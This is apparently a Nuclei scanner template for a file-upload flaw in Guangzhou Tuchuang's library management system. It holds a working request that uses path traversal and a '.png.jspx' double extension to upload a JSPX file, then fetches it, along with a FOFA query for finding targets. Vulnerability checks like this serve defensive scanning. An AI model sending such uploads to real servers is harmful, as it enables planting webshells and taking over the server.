http:
    - raw:
        - "POST /interlib/loan/PictureUpload HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj\n\n------WebKitFormBoundaryFfJZ4PlAZBixjELj\nContent-Disposition: form-data; name=\"/../{{username}}\"; filename=\"{{username}}.png.jspx\"\nContent-Type: image/png\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<jsp:root \n    xmlns:jsp=\"http://java.sun.com/JSP/Page\"\n    version=\"2.0\">\n    \n    <jsp:text>pboyjnnrfipmplsukdeczudsefxmywe</jsp:text>\n</jsp:root>\n------WebKitFormBoundaryFfJZ4PlAZBixjELj--\n"
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /interlib/{{username}}.png.jspx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
id: tuchuang-PictureUpload-File-upload
info:
    author: Superhero
    description: |-
        fofa: app="TCSOFT-图书馆集群管理系统"
        广州图创 图书馆集群管理系统 PictureUpload 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 广州图创 图书馆集群管理系统 PictureUpload 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/JDmpIwkJN1PMnBlTYJIWCA
    severity: high
    tags: []
variables:
    username: '{{to_lower(rand_base(6))}}'
